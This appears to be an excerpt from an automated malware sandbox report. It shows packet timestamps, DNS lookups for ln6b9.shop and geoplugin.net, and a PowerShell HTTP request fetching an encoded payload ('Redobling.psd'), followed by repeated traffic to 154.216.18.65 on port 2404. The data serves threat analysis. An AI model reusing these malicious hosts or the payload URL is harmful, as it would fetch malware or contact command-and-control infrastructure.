                    Oct 14, 2024 11:07:23.863018036 CEST499392404192.168.2.6154.216.18.65
                    Oct 14, 2024 11:07:23.863022089 CEST240449939154.216.18.65192.168.2.6
                    Oct 14, 2024 11:07:23.863061905 CEST240449939154.216.18.65192.168.2.6
                    Oct 14, 2024 11:07:23.863070011 CEST240449939154.216.18.65192.168.2.6
                    Oct 14, 2024 11:07:23.863085032 CEST240449939154.216.18.65192.168.2.6
                    Oct 14, 2024 11:07:23.863102913 CEST240449939154.216.18.65192.168.2.6
                    Oct 14, 2024 11:07:23.863120079 CEST499392404192.168.2.6154.216.18.65
                    Oct 14, 2024 11:07:23.863132000 CEST499392404192.168.2.6154.216.18.65
                    Oct 14, 2024 11:07:23.863149881 CEST240449939154.216.18.65192.168.2.6
                    Oct 14, 2024 11:07:23.863156080 CEST499392404192.168.2.6154.216.18.65
                    Oct 14, 2024 11:07:23.863158941 CEST240449939154.216.18.65192.168.2.6
                    Oct 14, 2024 11:07:23.863193035 CEST240449939154.216.18.65192.168.2.6
                    Oct 14, 2024 11:07:23.863200903 CEST240449939154.216.18.65192.168.2.6
                    Oct 14, 2024 11:07:23.863217115 CEST240449939154.216.18.65192.168.2.6
                    Oct 14, 2024 11:07:23.863265991 CEST499392404192.168.2.6154.216.18.65
                    Oct 14, 2024 11:07:23.863265991 CEST499392404192.168.2.6154.216.18.65
                    Oct 14, 2024 11:07:23.863265991 CEST499392404192.168.2.6154.216.18.65
                    Oct 14, 2024 11:07:23.863269091 CEST240449939154.216.18.65192.168.2.6
                    Oct 14, 2024 11:07:23.863348961 CEST240449939154.216.18.65192.168.2.6
                    Oct 14, 2024 11:07:23.863356113 CEST240449939154.216.18.65192.168.2.6
                    Oct 14, 2024 11:07:23.863370895 CEST240449939154.216.18.65192.168.2.6
                    Oct 14, 2024 11:07:23.863408089 CEST499392404192.168.2.6154.216.18.65
                    Oct 14, 2024 11:07:23.863497019 CEST240449939154.216.18.65192.168.2.6
                    Oct 14, 2024 11:07:23.863504887 CEST240449939154.216.18.65192.168.2.6
                    Oct 14, 2024 11:07:23.863521099 CEST240449939154.216.18.65192.168.2.6
                    Oct 14, 2024 11:07:23.863529921 CEST240449939154.216.18.65192.168.2.6
                    Oct 14, 2024 11:07:23.863539934 CEST240449939154.216.18.65192.168.2.6
                    Oct 14, 2024 11:07:23.863547087 CEST240449939154.216.18.65192.168.2.6
                    Oct 14, 2024 11:07:23.863555908 CEST240449939154.216.18.65192.168.2.6
                    Oct 14, 2024 11:07:23.863574982 CEST499392404192.168.2.6154.216.18.65
                    Oct 14, 2024 11:07:23.863574982 CEST499392404192.168.2.6154.216.18.65
                    Oct 14, 2024 11:07:23.863601923 CEST240449939154.216.18.65192.168.2.6
                    Oct 14, 2024 11:07:23.863637924 CEST499392404192.168.2.6154.216.18.65
                    Oct 14, 2024 11:07:23.863647938 CEST499392404192.168.2.6154.216.18.65
                    Oct 14, 2024 11:07:23.863671064 CEST240449939154.216.18.65192.168.2.6
                    Oct 14, 2024 11:07:23.863688946 CEST240449939154.216.18.65192.168.2.6
                    Oct 14, 2024 11:07:23.863698006 CEST240449939154.216.18.65192.168.2.6
                    Oct 14, 2024 11:07:23.863703966 CEST240449939154.216.18.65192.168.2.6
                    Oct 14, 2024 11:07:23.863718033 CEST240449939154.216.18.65192.168.2.6
                    Oct 14, 2024 11:07:23.863806963 CEST499392404192.168.2.6154.216.18.65
                    Oct 14, 2024 11:07:23.863806963 CEST499392404192.168.2.6154.216.18.65
                    Oct 14, 2024 11:07:23.882539034 CEST240449939154.216.18.65192.168.2.6
                    Oct 14, 2024 11:07:23.882586002 CEST240449939154.216.18.65192.168.2.6
                    Oct 14, 2024 11:07:23.882637978 CEST240449939154.216.18.65192.168.2.6
                    Oct 14, 2024 11:07:23.882656097 CEST240449939154.216.18.65192.168.2.6
                    Oct 14, 2024 11:07:23.882683039 CEST499392404192.168.2.6154.216.18.65
                    Oct 14, 2024 11:07:23.882692099 CEST240449939154.216.18.65192.168.2.6
                    Oct 14, 2024 11:07:23.882710934 CEST240449939154.216.18.65192.168.2.6
                    Oct 14, 2024 11:07:23.882741928 CEST499392404192.168.2.6154.216.18.65
                    Oct 14, 2024 11:07:23.882741928 CEST499392404192.168.2.6154.216.18.65
                    Oct 14, 2024 11:07:23.882747889 CEST240449939154.216.18.65192.168.2.6
                    Oct 14, 2024 11:07:23.882766962 CEST240449939154.216.18.65192.168.2.6
                    Oct 14, 2024 11:07:23.882782936 CEST240449939154.216.18.65192.168.2.6
                    Oct 14, 2024 11:07:23.882800102 CEST240449939154.216.18.65192.168.2.6
                    Oct 14, 2024 11:07:23.882822990 CEST499392404192.168.2.6154.216.18.65
                    Oct 14, 2024 11:07:23.882822990 CEST499392404192.168.2.6154.216.18.65
                    Oct 14, 2024 11:07:23.882834911 CEST240449939154.216.18.65192.168.2.6
                    Oct 14, 2024 11:07:23.882853985 CEST240449939154.216.18.65192.168.2.6
                    Oct 14, 2024 11:07:23.882872105 CEST240449939154.216.18.65192.168.2.6
                    Oct 14, 2024 11:07:23.882889032 CEST240449939154.216.18.65192.168.2.6
                    Oct 14, 2024 11:07:23.882899046 CEST499392404192.168.2.6154.216.18.65
                    Oct 14, 2024 11:07:23.882905960 CEST240449939154.216.18.65192.168.2.6
                    Oct 14, 2024 11:07:23.882922888 CEST240449939154.216.18.65192.168.2.6
                    Oct 14, 2024 11:07:23.882942915 CEST240449939154.216.18.65192.168.2.6
                    Oct 14, 2024 11:07:23.882978916 CEST499392404192.168.2.6154.216.18.65
                    Oct 14, 2024 11:07:23.882978916 CEST499392404192.168.2.6154.216.18.65
                    Oct 14, 2024 11:07:23.882978916 CEST499392404192.168.2.6154.216.18.65
                    Oct 14, 2024 11:07:23.883019924 CEST240449939154.216.18.65192.168.2.6
                    Oct 14, 2024 11:07:23.883037090 CEST240449939154.216.18.65192.168.2.6
                    Oct 14, 2024 11:07:23.883070946 CEST240449939154.216.18.65192.168.2.6
                    Oct 14, 2024 11:07:23.883080006 CEST499392404192.168.2.6154.216.18.65
                    Oct 14, 2024 11:07:23.883086920 CEST240449939154.216.18.65192.168.2.6
                    Oct 14, 2024 11:07:23.883102894 CEST240449939154.216.18.65192.168.2.6
                    Oct 14, 2024 11:07:23.883121014 CEST240449939154.216.18.65192.168.2.6
                    Oct 14, 2024 11:07:23.883141994 CEST499392404192.168.2.6154.216.18.65
                    Oct 14, 2024 11:07:23.883181095 CEST499392404192.168.2.6154.216.18.65
                    Oct 14, 2024 11:07:23.883188009 CEST240449939154.216.18.65192.168.2.6
                    Oct 14, 2024 11:07:23.883227110 CEST240449939154.216.18.65192.168.2.6
                    Oct 14, 2024 11:07:23.883244038 CEST240449939154.216.18.65192.168.2.6
                    Oct 14, 2024 11:07:23.883276939 CEST240449939154.216.18.65192.168.2.6
                    Oct 14, 2024 11:07:23.883295059 CEST240449939154.216.18.65192.168.2.6
                    Oct 14, 2024 11:07:23.883299112 CEST499392404192.168.2.6154.216.18.65
                    Oct 14, 2024 11:07:23.883325100 CEST499392404192.168.2.6154.216.18.65
                    Oct 14, 2024 11:07:23.883332014 CEST240449939154.216.18.65192.168.2.6
                    Oct 14, 2024 11:07:23.883351088 CEST240449939154.216.18.65192.168.2.6
                    Oct 14, 2024 11:07:23.883419991 CEST240449939154.216.18.65192.168.2.6
                    Oct 14, 2024 11:07:23.883435011 CEST499392404192.168.2.6154.216.18.65
                    Oct 14, 2024 11:07:23.883457899 CEST240449939154.216.18.65192.168.2.6
                    Oct 14, 2024 11:07:23.883498907 CEST240449939154.216.18.65192.168.2.6
                    Oct 14, 2024 11:07:23.883516073 CEST240449939154.216.18.65192.168.2.6
                    Oct 14, 2024 11:07:23.883546114 CEST499392404192.168.2.6154.216.18.65
                    Oct 14, 2024 11:07:23.883547068 CEST240449939154.216.18.65192.168.2.6
                    Oct 14, 2024 11:07:23.883565903 CEST240449939154.216.18.65192.168.2.6
                    Oct 14, 2024 11:07:23.883574963 CEST499392404192.168.2.6154.216.18.65
                    Oct 14, 2024 11:07:23.883582115 CEST240449939154.216.18.65192.168.2.6
                    Oct 14, 2024 11:07:23.883595943 CEST499392404192.168.2.6154.216.18.65
                    Oct 14, 2024 11:07:23.883601904 CEST240449939154.216.18.65192.168.2.6
                    Oct 14, 2024 11:07:23.883625031 CEST240449939154.216.18.65192.168.2.6
                    Oct 14, 2024 11:07:23.883641005 CEST240449939154.216.18.65192.168.2.6
                    Oct 14, 2024 11:07:23.883656979 CEST499392404192.168.2.6154.216.18.65
                    Oct 14, 2024 11:07:23.883658886 CEST240449939154.216.18.65192.168.2.6
                    Oct 14, 2024 11:07:23.883688927 CEST499392404192.168.2.6154.216.18.65
                    Oct 14, 2024 11:07:23.883727074 CEST240449939154.216.18.65192.168.2.6
                    Oct 14, 2024 11:07:23.883733034 CEST499392404192.168.2.6154.216.18.65
                    Oct 14, 2024 11:07:23.883744955 CEST240449939154.216.18.65192.168.2.6
                    Oct 14, 2024 11:07:23.883761883 CEST240449939154.216.18.65192.168.2.6
                    Oct 14, 2024 11:07:23.883797884 CEST240449939154.216.18.65192.168.2.6
                    Oct 14, 2024 11:07:23.883816004 CEST499392404192.168.2.6154.216.18.65
                    Oct 14, 2024 11:07:23.883831978 CEST240449939154.216.18.65192.168.2.6
                    Oct 14, 2024 11:07:23.883899927 CEST240449939154.216.18.65192.168.2.6
                    Oct 14, 2024 11:07:23.883917093 CEST240449939154.216.18.65192.168.2.6
                    Oct 14, 2024 11:07:23.883966923 CEST240449939154.216.18.65192.168.2.6
                    Oct 14, 2024 11:07:23.883969069 CEST499392404192.168.2.6154.216.18.65
                    Oct 14, 2024 11:07:23.883969069 CEST499392404192.168.2.6154.216.18.65
                    Oct 14, 2024 11:07:23.883982897 CEST240449939154.216.18.65192.168.2.6
                    Oct 14, 2024 11:07:23.884023905 CEST240449939154.216.18.65192.168.2.6
                    Oct 14, 2024 11:07:23.884057045 CEST499392404192.168.2.6154.216.18.65
                    Oct 14, 2024 11:07:23.884061098 CEST240449939154.216.18.65192.168.2.6
                    Oct 14, 2024 11:07:23.884078979 CEST240449939154.216.18.65192.168.2.6
                    Oct 14, 2024 11:07:23.884095907 CEST240449939154.216.18.65192.168.2.6
                    Oct 14, 2024 11:07:23.884129047 CEST240449939154.216.18.65192.168.2.6
                    Oct 14, 2024 11:07:23.884179115 CEST240449939154.216.18.65192.168.2.6
                    Oct 14, 2024 11:07:23.884182930 CEST499392404192.168.2.6154.216.18.65
                    Oct 14, 2024 11:07:23.884182930 CEST499392404192.168.2.6154.216.18.65
                    Oct 14, 2024 11:07:23.884182930 CEST499392404192.168.2.6154.216.18.65
                    Oct 14, 2024 11:07:23.884196043 CEST240449939154.216.18.65192.168.2.6
                    Oct 14, 2024 11:07:23.884217978 CEST240449939154.216.18.65192.168.2.6
                    Oct 14, 2024 11:07:23.884232998 CEST240449939154.216.18.65192.168.2.6
                    Oct 14, 2024 11:07:23.884243965 CEST499392404192.168.2.6154.216.18.65
                    Oct 14, 2024 11:07:23.884249926 CEST240449939154.216.18.65192.168.2.6
                    Oct 14, 2024 11:07:23.884268045 CEST240449939154.216.18.65192.168.2.6
                    Oct 14, 2024 11:07:23.884283066 CEST240449939154.216.18.65192.168.2.6
                    Oct 14, 2024 11:07:23.884299994 CEST240449939154.216.18.65192.168.2.6
                    Oct 14, 2024 11:07:23.884315968 CEST240449939154.216.18.65192.168.2.6
                    Oct 14, 2024 11:07:23.884325981 CEST499392404192.168.2.6154.216.18.65
                    Oct 14, 2024 11:07:23.884325981 CEST499392404192.168.2.6154.216.18.65
                    Oct 14, 2024 11:07:23.884332895 CEST240449939154.216.18.65192.168.2.6
                    Oct 14, 2024 11:07:23.884351969 CEST240449939154.216.18.65192.168.2.6
                    Oct 14, 2024 11:07:23.884368896 CEST240449939154.216.18.65192.168.2.6
                    Oct 14, 2024 11:07:23.884383917 CEST499392404192.168.2.6154.216.18.65
                    Oct 14, 2024 11:07:23.884383917 CEST499392404192.168.2.6154.216.18.65
                    Oct 14, 2024 11:07:23.884448051 CEST499392404192.168.2.6154.216.18.65
                    Oct 14, 2024 11:07:23.884630919 CEST240449939154.216.18.65192.168.2.6
                    Oct 14, 2024 11:07:23.884668112 CEST240449939154.216.18.65192.168.2.6
                    Oct 14, 2024 11:07:23.884720087 CEST240449939154.216.18.65192.168.2.6
                    Oct 14, 2024 11:07:23.884737015 CEST240449939154.216.18.65192.168.2.6
                    Oct 14, 2024 11:07:23.884769917 CEST240449939154.216.18.65192.168.2.6
                    Oct 14, 2024 11:07:23.884785891 CEST240449939154.216.18.65192.168.2.6
                    Oct 14, 2024 11:07:23.884788990 CEST499392404192.168.2.6154.216.18.65
                    Oct 14, 2024 11:07:23.884788990 CEST499392404192.168.2.6154.216.18.65
                    Oct 14, 2024 11:07:23.884804010 CEST240449939154.216.18.65192.168.2.6
                    Oct 14, 2024 11:07:23.884821892 CEST240449939154.216.18.65192.168.2.6
                    Oct 14, 2024 11:07:23.884876966 CEST499392404192.168.2.6154.216.18.65
                    Oct 14, 2024 11:07:23.884876966 CEST499392404192.168.2.6154.216.18.65
                    Oct 14, 2024 11:07:23.888233900 CEST240449939154.216.18.65192.168.2.6
                    Oct 14, 2024 11:07:23.888281107 CEST240449939154.216.18.65192.168.2.6
                    Oct 14, 2024 11:07:23.888341904 CEST240449939154.216.18.65192.168.2.6
                    Oct 14, 2024 11:07:23.888379097 CEST240449939154.216.18.65192.168.2.6
                    Oct 14, 2024 11:07:23.888412952 CEST240449939154.216.18.65192.168.2.6
                    Oct 14, 2024 11:07:23.888428926 CEST499392404192.168.2.6154.216.18.65
                    Oct 14, 2024 11:07:23.888430119 CEST240449939154.216.18.65192.168.2.6
                    Oct 14, 2024 11:07:23.888428926 CEST499392404192.168.2.6154.216.18.65
                    Oct 14, 2024 11:07:23.888448954 CEST240449939154.216.18.65192.168.2.6
                    Oct 14, 2024 11:07:23.888465881 CEST240449939154.216.18.65192.168.2.6
                    Oct 14, 2024 11:07:23.888499022 CEST240449939154.216.18.65192.168.2.6
                    Oct 14, 2024 11:07:23.888515949 CEST240449939154.216.18.65192.168.2.6
                    Oct 14, 2024 11:07:23.888535976 CEST240449939154.216.18.65192.168.2.6
                    Oct 14, 2024 11:07:23.888567924 CEST240449939154.216.18.65192.168.2.6
                    Oct 14, 2024 11:07:23.888581991 CEST499392404192.168.2.6154.216.18.65
                    Oct 14, 2024 11:07:23.888581991 CEST499392404192.168.2.6154.216.18.65
                    Oct 14, 2024 11:07:23.888581991 CEST499392404192.168.2.6154.216.18.65
                    Oct 14, 2024 11:07:23.888586044 CEST240449939154.216.18.65192.168.2.6
                    Oct 14, 2024 11:07:23.888603926 CEST240449939154.216.18.65192.168.2.6
                    Oct 14, 2024 11:07:23.888690948 CEST499392404192.168.2.6154.216.18.65
                    Oct 14, 2024 11:07:23.888690948 CEST499392404192.168.2.6154.216.18.65
                    Oct 14, 2024 11:07:23.894984007 CEST499392404192.168.2.6154.216.18.65
                    Oct 14, 2024 11:07:23.952655077 CEST240449939154.216.18.65192.168.2.6
                    Oct 14, 2024 11:07:23.991980076 CEST499392404192.168.2.6154.216.18.65
                    Oct 14, 2024 11:07:24.346169949 CEST8049945178.237.33.50192.168.2.6
                    Oct 14, 2024 11:07:24.346203089 CEST240449939154.216.18.65192.168.2.6
                    Oct 14, 2024 11:07:24.346227884 CEST4994580192.168.2.6178.237.33.50
                    Oct 14, 2024 11:07:24.346237898 CEST8049945178.237.33.50192.168.2.6
                    Oct 14, 2024 11:07:24.346321106 CEST4994580192.168.2.6178.237.33.50
                    Oct 14, 2024 11:07:24.346332073 CEST499392404192.168.2.6154.216.18.65
                    Oct 14, 2024 11:07:27.569278955 CEST499392404192.168.2.6154.216.18.65
                    Oct 14, 2024 11:07:27.574403048 CEST240449939154.216.18.65192.168.2.6
                    Oct 14, 2024 11:07:27.574409962 CEST240449939154.216.18.65192.168.2.6
                    Oct 14, 2024 11:07:27.574429035 CEST240449939154.216.18.65192.168.2.6
                    Oct 14, 2024 11:07:27.574433088 CEST240449939154.216.18.65192.168.2.6
                    Oct 14, 2024 11:07:27.574487925 CEST240449939154.216.18.65192.168.2.6
                    Oct 14, 2024 11:07:27.574491978 CEST240449939154.216.18.65192.168.2.6
                    Oct 14, 2024 11:07:27.574501991 CEST240449939154.216.18.65192.168.2.6
                    Oct 14, 2024 11:07:27.574506044 CEST240449939154.216.18.65192.168.2.6
                    Oct 14, 2024 11:07:27.574547052 CEST240449939154.216.18.65192.168.2.6
                    Oct 14, 2024 11:07:27.574551105 CEST240449939154.216.18.65192.168.2.6
                    Oct 14, 2024 11:07:27.574558020 CEST499392404192.168.2.6154.216.18.65
                    Oct 14, 2024 11:07:27.579539061 CEST240449939154.216.18.65192.168.2.6
                    Oct 14, 2024 11:07:27.579557896 CEST240449939154.216.18.65192.168.2.6
                    Oct 14, 2024 11:07:27.579586029 CEST240449939154.216.18.65192.168.2.6
                    Oct 14, 2024 11:07:27.579590082 CEST240449939154.216.18.65192.168.2.6
                    Oct 14, 2024 11:07:27.579618931 CEST240449939154.216.18.65192.168.2.6
                    Oct 14, 2024 11:07:27.579652071 CEST240449939154.216.18.65192.168.2.6
                    Oct 14, 2024 11:07:27.579713106 CEST240449939154.216.18.65192.168.2.6
                    Oct 14, 2024 11:07:27.895322084 CEST240449939154.216.18.65192.168.2.6
                    Oct 14, 2024 11:07:27.895401001 CEST499392404192.168.2.6154.216.18.65
                    Oct 14, 2024 11:07:28.133043051 CEST499392404192.168.2.6154.216.18.65
                    Oct 14, 2024 11:07:28.138093948 CEST240449939154.216.18.65192.168.2.6
                    Oct 14, 2024 11:07:48.864891052 CEST240449928154.216.18.65192.168.2.6
                    Oct 14, 2024 11:07:48.866251945 CEST499282404192.168.2.6154.216.18.65
                    Oct 14, 2024 11:07:48.871062040 CEST240449928154.216.18.65192.168.2.6
                    Oct 14, 2024 11:08:18.876830101 CEST240449928154.216.18.65192.168.2.6
                    Oct 14, 2024 11:08:18.878531933 CEST499282404192.168.2.6154.216.18.65
                    Oct 14, 2024 11:08:18.883368969 CEST240449928154.216.18.65192.168.2.6
                    TimestampSource PortDest PortSource IPDest IP
                    Oct 14, 2024 11:06:39.848824024 CEST6073653192.168.2.61.1.1.1
                    Oct 14, 2024 11:06:39.861367941 CEST53607361.1.1.1192.168.2.6
                    Oct 14, 2024 11:07:22.386499882 CEST5091253192.168.2.61.1.1.1
                    Oct 14, 2024 11:07:22.393507957 CEST53509121.1.1.1192.168.2.6
                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                    Oct 14, 2024 11:06:39.848824024 CEST192.168.2.61.1.1.10x4cbaStandard query (0)ln6b9.shopA (IP address)IN (0x0001)false
                    Oct 14, 2024 11:07:22.386499882 CEST192.168.2.61.1.1.10x9828Standard query (0)geoplugin.netA (IP address)IN (0x0001)false
                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                    Oct 14, 2024 11:06:35.178853989 CEST1.1.1.1192.168.2.60x5d39No error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                    Oct 14, 2024 11:06:35.178853989 CEST1.1.1.1192.168.2.60x5d39No error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                    Oct 14, 2024 11:06:39.861367941 CEST1.1.1.1192.168.2.60x4cbaNo error (0)ln6b9.shop172.67.128.117A (IP address)IN (0x0001)false
                    Oct 14, 2024 11:06:39.861367941 CEST1.1.1.1192.168.2.60x4cbaNo error (0)ln6b9.shop104.21.2.6A (IP address)IN (0x0001)false
                    Oct 14, 2024 11:06:53.968945980 CEST1.1.1.1192.168.2.60x4be4No error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                    Oct 14, 2024 11:06:53.968945980 CEST1.1.1.1192.168.2.60x4be4No error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                    Oct 14, 2024 11:07:22.393507957 CEST1.1.1.1192.168.2.60x9828No error (0)geoplugin.net178.237.33.50A (IP address)IN (0x0001)false
                    • ln6b9.shop
                    • geoplugin.net
                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    0192.168.2.649712172.67.128.117801908C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    TimestampBytes transferredDirectionData
                    Oct 14, 2024 11:06:39.871543884 CEST176OUTGET /amykhRcM/Redobling.psd HTTP/1.1
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                    Host: ln6b9.shop
                    Connection: Keep-Alive
                    Oct 14, 2024 11:06:40.496243000 CEST568INHTTP/1.1 200 OK
                    Date: Mon, 14 Oct 2024 09:06:40 GMT
                    Content-Type: application/octet-stream
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    cf-cache-status: DYNAMIC
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hdrvP6A7ue%2F%2Bx3sMyoAZi4nY5hLncENTaDOp%2BvUROVXSdihQ14nvCqCSa4DFFsqiVcKihrfbWQ%2FWlNzQcrLvtR3et8RrXm2CWzUUPktyhCFkJdr1Un1ymauNpelr"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 8d266a29bdfdc461-EWR
                    alt-svc: h2=":443"; ma=60
                    Oct 14, 2024 11:06:40.496305943 CEST1236INData Raw: 33 31 65 61 0d 0a 63 51 47 62 36 77 49 59 38 37 73 6c 69 68 49 41 36 77 4a 45 5a 4f 73 43 48 5a 77 44 58 43 51 45 36 77 4c 4b 64 58 45 42 6d 37 6b 6b 4d 38 41 7a 36 77 4a 4f 6c 2b 73 43 58 76 6d 42 38 51 6e 77 50 33 33 72 41 67 53 2f 63 51 47 62
                    Data Ascii: 31eacQGb6wIY87slihIA6wJEZOsCHZwDXCQE6wLKdXEBm7kkM8Az6wJOl+sCXvmB8QnwP33rAgS/cQGbgektw/9OcQGb6wL4jnEBm+sCJp66ldZyKusCoJzrApCt6wJLuOsCowwxynEBm+sCG2CJFAvrAjew6wJA6NHicQGb6wKuyIPBBOsCeLZxAZuB+ZvYtgN8yXEBm3EBm4tEJATrAtrN6wKLTonD6wLYj3EBm4HD7DPIA
                    Oct 14, 2024 11:06:40.496437073 CEST1236INData Raw: 61 68 48 72 74 6d 6f 4a 45 2b 61 70 33 6b 49 79 4e 4a 45 51 6f 47 6f 52 68 6a 48 73 63 55 37 54 70 35 4b 66 55 65 6a 49 34 47 37 4a 68 51 4f 35 78 56 46 64 57 47 61 61 54 73 4c 54 36 4c 43 34 43 61 76 43 36 4a 37 49 32 45 42 72 43 49 6f 4f 72 68
                    Data Ascii: ahHrtmoJE+ap3kIyNJEQoGoRhjHscU7Tp5KfUejI4G7JhQO5xVFdWGaaTsLT6LC4CavC6J7I2EBrCIoOrhuzoCKNQWZJyaJoZjGnMeG5xHlZwV0OqJuzoCJEm3h2mRPgIhbo3rZvQ6AvkSg66hkT5vrhUOyaGRt7+kkz4CKFa7wPYagwejkT5ooHoiQWTcuFQJEEwLsOVM7jKBISDACzwFs4ulAB7VBP0UWT4CoRHA/kknXwah9
                    Oct 14, 2024 11:06:40.496448994 CEST1236INData Raw: 6b 48 50 73 65 41 68 66 53 72 79 34 4e 58 46 41 63 4b 4c 68 44 34 2f 44 56 63 75 31 55 39 47 4e 6b 44 6c 67 77 47 32 74 36 5a 52 5a 79 6b 75 59 62 46 59 4a 50 72 5a 31 74 47 4f 54 41 75 77 52 6b 2b 30 58 77 41 51 57 4c 54 62 61 31 76 43 55 59 33
                    Data Ascii: kHPseAhfSry4NXFAcKLhD4/DVcu1U9GNkDlgwG2t6ZRZykuYbFYJPrZ1tGOTAuwRk+0XwAQWLTba1vCUY3Fj14O9KWyz+f6JQ6Ts4Hw/+kQBgtOgtVLs9RN9SD6VnwKH3pl2C/85t8qFUgYPzN4Yu/86Th7tggUA0TcQi3A49wKhf2EGfHjE6rfY2eeRVC9sFTkNwgACZOUSRxrk4nI3JnUioUEQChkW25UAcHHiBS069Vkr/pS
                    Oct 14, 2024 11:06:40.496460915 CEST1236INData Raw: 58 5a 4f 6d 78 38 47 73 55 62 52 68 6c 79 4d 6a 54 31 50 59 49 33 41 43 5a 6e 76 49 59 32 2b 76 46 6a 66 2f 4f 75 70 2b 55 59 30 6a 30 36 63 4d 2f 47 57 71 36 52 34 50 4b 68 6b 54 34 43 6f 5a 45 2b 41 71 47 52 50 67 4b 68 6b 54 34 43 6f 5a 45 4c
                    Data Ascii: XZOmx8GsUbRhlyMjT1PYI3ACZnvIY2+vFjf/Oup+UY0j06cM/GWq6R4PKhkT4CoZE+AqGRPgKhkT4CoZELsAvNde9/dD4x9y/z8U48v8TT7W76IFdinSDIv/QArPz9KJ8yzVSVCmuFG9WjFCprOoOO9xd99B5xllouEbTMqAWdHsTlKjZRTXMHZA5rXHlFcWMRU2nPt5czkD4CGwts5iyePhKdkT4CoZE+AqGRPgKhkT4CoZE+O
                    Oct 14, 2024 11:06:40.496471882 CEST1236INData Raw: 63 73 59 65 72 7a 78 6f 45 4d 55 71 49 70 67 31 61 66 63 31 4c 4a 45 4e 48 77 62 49 6b 58 67 31 61 66 7a 30 6a 33 77 71 4b 4c 51 70 41 46 6e 38 65 6f 78 58 4b 33 44 65 68 62 65 66 52 48 4c 39 79 2f 36 33 37 6a 4e 46 33 70 38 6e 31 72 71 52 71 6c
                    Data Ascii: csYerzxoEMUqIpg1afc1LJENHwbIkXg1afz0j3wqKLQpAFn8eoxXK3DehbefRHL9y/637jNF3p8n1rqRql/RWoEMXGrjoYySRbZfVnVa81086/xIt8GDWuVgbEoZE+AqGRPgKhkT4CoZE+AqGRNXrgI6S8YRK/7KfTug7xKTnwZ5cT+2k04S9iybRSlAcpFqmk48QjT2meKHY/BTyp7nO3ajxeJieRfqPuzqFJItRLFRLgTgud3
                    Oct 14, 2024 11:06:40.496483088 CEST1120INData Raw: 46 6a 78 54 45 43 74 30 34 2b 41 71 47 52 50 67 4b 68 6b 54 34 43 6f 5a 45 2b 41 71 47 52 50 67 4b 54 49 39 71 34 33 67 67 46 57 2f 66 38 34 53 77 30 31 46 36 6c 57 78 44 58 63 55 44 77 5a 34 4e 51 48 2b 43 47 65 63 4b 46 33 30 74 78 5a 59 4e 69
                    Data Ascii: FjxTECt04+AqGRPgKhkT4CoZE+AqGRPgKTI9q43ggFW/f84Sw01F6lWxDXcUDwZ4NQH+CGecKF30txZYNiS54zrhD9rPvuwINiVJRsNxgFtLQUX6WQyoSU/8p373Do77mS1QEOKBtlg1DageaCwoUF7pqPg1LT+v6VEM2Hl1xPg2JZ+z6nEM1hbebEi5qQ868QIaWMs6ttI1Y4wAPOSdRW5aIHuNnsGZGiBLLZuFg8Q47Kbw2nw
                    Oct 14, 2024 11:06:40.496495008 CEST1236INData Raw: 4b 54 32 68 5a 51 55 49 71 4a 67 43 42 4d 38 51 30 5a 65 2f 43 6e 4e 78 44 49 49 65 52 74 70 34 4e 50 78 2b 44 47 2f 46 30 63 6d 41 72 77 6d 75 70 37 2b 50 43 61 4f 65 36 38 76 34 57 34 2f 63 33 4d 52 47 55 6b 4b 6b 64 69 41 47 69 41 67 2b 73 75
                    Data Ascii: KT2hZQUIqJgCBM8Q0Ze/CnNxDIIeRtp4NPx+DG/F0cmArwmup7+PCaOe68v4W4/c3MRGUkKkdiAGiAg+sueG+IIm7BqgBO+b0OE2N9l+jE9iB/cssqb2y4PVde0CBj9SAN37/wP5JF9CB74mKWnL/ADgBBoCibGVZb5Swtb2Kxhc7q+okRUz5pSKgxI08aZMUk5DwCodY4wujGgfy54U+DZrEc6WkQyVX1Z4CDVkym8EgQ0fO3z
                    Oct 14, 2024 11:06:40.496507883 CEST1236INData Raw: 61 44 55 67 38 66 6b 4c 4c 42 68 69 47 78 4e 62 51 33 52 54 78 30 53 35 53 7a 43 75 78 69 47 44 37 48 57 54 50 39 39 35 36 35 79 71 74 66 48 59 65 73 48 61 39 63 6e 39 31 64 37 69 57 71 45 45 37 47 35 74 52 68 6d 32 4f 76 52 57 34 5a 6c 4e 4c 39
                    Data Ascii: aDUg8fkLLBhiGxNbQ3RTx0S5SzCuxiGD7HWTP99565yqtfHYesHa9cn91d7iWqEE7G5tRhm2OvRW4ZlNL9qW6CvCTfP+R0Teta9i5JY1GZv/VLSPQWIFa71mRytzVt7TseFgAPkwOSGpAvLT7v1eFL6pwID6rBJ/MTLPtEJgXuMen9rWGDUhsAdyAQ1dlg3TRRKgz7A6GRb7vpZXNDIFAh7AIlv/NqEtyqIGBG8pblv+t1ARor8
                    Oct 14, 2024 11:06:40.496519089 CEST1236INData Raw: 47 47 58 42 42 49 44 43 2f 79 52 4f 45 68 6c 50 36 31 43 53 79 38 4b 78 42 54 45 72 63 36 37 52 50 34 59 52 36 4c 57 4e 62 42 75 70 54 48 35 53 34 54 78 74 42 55 6b 31 4b 6f 70 37 71 71 4f 74 78 6d 2f 52 54 52 50 77 4b 68 58 57 41 49 6a 66 73 69
                    Data Ascii: GGXBBIDC/yROEhlP61CSy8KxBTErc67RP4YR6LWNbBupTH5S4TxtBUk1Kop7qqOtxm/RTRPwKhXWAIjfsibtYxcc1MbUHs/1NW/Ft9EQjFnIZdPskPkUmfdwahnj9XoZE+AqGRPgKhkT4CoZE+AqGRPjS9tkfyEL7taGwnw972LpZF/tK/xQJznckgVnMZXGG3HcmbsfqrI7nHN+8ZryLph5cmvIJTlsWQmoUsX+iHSEhV/sCH2
